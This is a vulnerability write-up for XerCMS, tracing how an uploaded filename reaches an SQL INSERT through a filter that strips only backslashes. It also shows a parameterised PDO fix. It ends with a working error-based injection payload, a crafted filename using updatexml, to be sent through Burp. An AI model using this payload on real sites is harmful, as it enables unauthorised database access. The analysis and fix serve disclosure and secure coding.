SQL injection in the upfiles function of D:\wamp\www\XerCMS\Modules\member\index.php
```
public function upfiles() {
    setformat('json');
    $config = ini('member/group/'.X::$G['group']);
    if(empty($config)) {
        exit('Access Denied');
    } else {
        if($config['upload'][0] == 0) {
            error('upload_group_limit');
        } else if($config['upload'][1] != 0 && X::$G['upload'] > $config['upload'][1]) {
            error('upload_group_size');
        }
    }
    $id = int1(g('id'));
    c('upload')->load($id);
    $image = ini('image');
    if(isset($image['status']{2})) {
        c('upload')->config['thumbs'] = array(array('width'=>$image['width'],'height'=>$image['height'],'cut'=>$image['cut'],'quality'=>$image['quality']));
    } else {
        if(isset(c('upload')->config['thumbs'])) unset(c('upload')->config['thumbs']);
    }
    c('upload')->files();
    c('upload')->show();
}
```
The problem is this line:
```
c('upload')->files();
```
Following the files function, located in D:\wamp\www\XerCMS\Library\XerCMS_upload.php:
```
function files() {
    foreach($_FILES as $k=>$v) {
        $this->file($k);
    }
}
```
As can be seen, it iterates over the uploaded files in $_FILES and hands each one to the file function. Following the file function next, also in D:\wamp\www\XerCMS\Library\XerCMS_upload.php (only part of the code is excerpted):
```
function file($name) {
    if(isset($_FILES[$name]['tmp_name']) && !empty($_FILES[$name]['tmp_name'])) {
        $ext = $this->ext($_FILES[$name]['name']);
        if(in_array(strtolower($ext),$this->forbid) || preg_match('/([^a-z0-9])/i',$ext,$match)) {
            $this->result[$name]['error'] = 'Ext';return;
        }
        if(!empty($this->config['maxsize']) && $_FILES[$name]['size'] > $this->config['maxsize']) {
            $this->result[$name]['error'] = 'Size';return;
        }
        $rid = $this->record($_FILES[$name]);
        $this->dir($this->config['path'],$rid,$ext);
        if(is_uploaded_file($_FILES[$name]['tmp_name']))
        // ... the excerpt ends here; the rest of the function is not shown in the original
```
The problem is here:
```
$rid = $this->record($_FILES[$name]);
```
Note that only the extension is validated above; the full entry for the uploaded file, including its name, is passed into the record function, located in D:\wamp\www\XerCMS\Library\XerCMS_upload.php:
```
function record($upfile) {
    if (X::$G['uid']) {
        DB::add('xercms_member_count',array('upload'=>$upfile['size']),array('uid'=>X::$G['uid']));
    }
    DB::insert('xercms_member_upfiles',
        array('uid'=>X::$G['uid'],
            'size'=>$upfile['size'],
            'name'=>$upfile['name'],
            'time'=>X::$G['time'],
            'ip'=>X::$G['ip'],
            'type'=>$this->cid));
    return DB::lastid();
}
```
It can be seen that
```
$upfile['name']
```
that is, the uploaded filename we mentioned, is passed into DB::insert. Following that function:
```
static function insert($table,$fields) {
    if(empty($fields)) {
        return;
    }
    foreach($fields as $k=>$v) {
        $content[] = '`'.DB::filter($k,'f').'` = \''.DB::filter($v).'\'';
    }
    self::query('INSERT INTO '.$table.' SET '.implode(',',$content),self::$connect);
    return self::lastid();
}
```
The `$fields` array is filtered before being concatenated into the query: each array key goes through `DB::filter($k,'f')` and each array value through `DB::filter($v)`. Now look at the filter function:
```
static function filter($str,$t = '') {
    $str = (string)$str;
    switch($t) {
        case 'f':
            return preg_replace('/([^a-z0-9_])/i','',$str);
            break;
        default:
            return trim($str,'\\');
            break;
    }
}
```
When `$t='f'`, `return preg_replace('/([^a-z0-9_])/i','',$str);` strips every character except letters, digits and underscores, so no injection is possible through that branch.
When `$t` is empty, the function only does `return trim($str,'\\');`, which removes leading and trailing backslashes and leaves single quotes untouched, so injection is possible.
So the array keys cannot be injected, but the array values can, which means the filename can be injected.
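To make the difference between the two filter branches concrete, the following is an added example (not XerCMS code) that reproduces the filter/insert string-building shown above and contrasts it with a parameterised rewrite. The function names `weak_filter`, `identifier_filter`, `build_insert_sql` and `safe_insert` are chosen for this example; the `$pdo` connection and the sample filename are placeholders; the table and column names are the ones from the page.

```php
<?php
// Added example, not XerCMS code: reproduces what DB::filter()/DB::insert()
// do to an uploaded filename and shows a parameterised rewrite.
// Function names are chosen for this example; $pdo is a placeholder connection.

// The default branch of DB::filter(): only leading/trailing backslashes are removed.
function weak_filter(string $str): string
{
    return trim($str, '\\');
}

// The 'f' branch of DB::filter(): identifiers are reduced to [A-Za-z0-9_].
function identifier_filter(string $str): string
{
    return preg_replace('/([^a-z0-9_])/i', '', $str);
}

// What DB::insert() concatenates before handing the string to self::query().
function build_insert_sql(string $table, array $fields): string
{
    $content = [];
    foreach ($fields as $k => $v) {
        $content[] = '`' . identifier_filter((string)$k) . '` = \'' . weak_filter((string)$v) . '\'';
    }
    return 'INSERT INTO ' . $table . ' SET ' . implode(',', $content);
}

// Hardened rewrite: values are bound as parameters, so quote characters in a
// filename remain data. Identifiers cannot be bound, so they keep the allow-list.
function safe_insert(PDO $pdo, string $table, array $fields): string
{
    if ($fields === []) {
        throw new InvalidArgumentException('insert needs at least one field');
    }
    $assignments = [];
    $params = [];
    foreach ($fields as $k => $v) {
        $col = identifier_filter((string)$k);
        if ($col === '' || isset($params[':' . $col])) {
            throw new InvalidArgumentException('invalid or duplicate column name: ' . $k);
        }
        $assignments[] = '`' . $col . '` = :' . $col;
        $params[':' . $col] = (string)$v;
    }
    $sql = 'INSERT INTO `' . identifier_filter($table) . '` SET ' . implode(', ', $assignments);
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return (string)$pdo->lastInsertId();
}

// Constructed sample: a filename carrying a single quote, as a client may submit it.
$sample = "photo'.jpg";
echo build_insert_sql('xercms_member_upfiles', ['uid' => 1, 'name' => $sample]), PHP_EOL;
// In the printed string the quote inside the filename terminates the 'name'
// literal early, which is the defect the writeup describes.

// Usage of the hardened version (placeholder DSN and credentials, not executed here):
// $pdo = new PDO('mysql:host=localhost;dbname=PLACEHOLDER_DB', 'PLACEHOLDER_USER', 'PLACEHOLDER_PASS',
//                [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// safe_insert($pdo, 'xercms_member_upfiles', ['uid' => 1, 'name' => $sample]);
```

Setting `PDO::ATTR_EMULATE_PREPARES` to false makes the MySQL server perform the binding rather than having the PDO driver escape values client-side, so the filename never becomes part of the SQL text. The allow-list on identifiers is still needed because column and table names cannot be bound; in XerCMS they come from code, not from the request, and the filter only guards against mistakes there. A secondary check, not a substitute for binding, is to validate the whole uploaded name (not just its extension, which is all the `Ext` check in file() covers) against an allow-list of characters before it reaches record().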
Intercept the upload in Burp and change the filename to:
```
44' or updatexml(1,concat(0x7e,(version())),0) or '.jpg
```